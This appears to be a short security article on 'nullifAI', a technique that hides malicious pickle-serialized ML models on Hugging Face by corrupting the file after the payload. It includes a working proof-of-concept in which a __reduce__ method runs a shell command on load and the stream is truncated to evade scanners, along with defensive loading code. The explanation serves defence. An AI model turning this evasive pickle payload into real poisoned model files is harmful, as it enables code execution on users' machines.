Researchers have identified malicious machine learning (ML) models on Hugging Face that use a novel technique, ‘broken’ pickle files, to evade detection. The attack, dubbed ‘nullifAI’, abuses Python’s pickle serialization format: because the unpickler executes opcodes sequentially during deserialization, attacker-controlled Python code runs when a model is loaded, even if the stream is corrupted after the payload. Hugging Face’s security mechanisms did not initially flag the malicious models as unsafe.
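A minimal sketch of the underlying mechanism (illustrative only, not the actual nullifAI payload): a class’s `__reduce__` method lets a pickle invoke an arbitrary callable on load, and because opcodes execute as they stream in, the payload fires even when the file is truncated into a ‘broken’ state that a scanner may fail to parse.

```python
import os
import pickle

class Payload:
    def __reduce__(self):
        # On deserialization, the unpickler calls os.system("echo pwned")
        return (os.system, ("echo pwned",))

data = pickle.dumps(Payload())

# "Break" the stream by dropping the trailing STOP opcode,
# mimicking a malformed file that a naive scanner rejects.
broken = data[:-1]

try:
    pickle.loads(broken)
except Exception as e:
    # The load fails with EOFError -- but only *after* the REDUCE
    # opcode has already executed the payload and printed "pwned".
    print(f"Deserialization failed: {e}")
```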
Vulnerabilities in Hugging Face’s model-loading libraries allow malicious model uploads that lead to code execution. Deprecated loading methods and weak validation of legacy model formats give attackers room to inject and execute arbitrary code, affecting the various ML frameworks integrated with Hugging Face.
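The practical defense follows from the mechanism: avoid running a full pickle deserialization on untrusted model files. A hedged sketch of two common options (the file paths here are placeholders): PyTorch’s `weights_only=True` flag restricts the unpickler to tensor and primitive types, and the safetensors format avoids executable serialization entirely.

```python
import torch
from safetensors.torch import load_file

# Safer: weights_only=True restricts unpickling to tensors and
# primitives, so a __reduce__-based payload raises instead of running.
# (Available since PyTorch 1.13; the default from PyTorch 2.6.)
state_dict = torch.load("model.bin", map_location="cpu", weights_only=True)

# Safest: safetensors is a plain header plus raw tensor buffers,
# with no code-execution path during loading.
state_dict = load_file("model.safetensors")
```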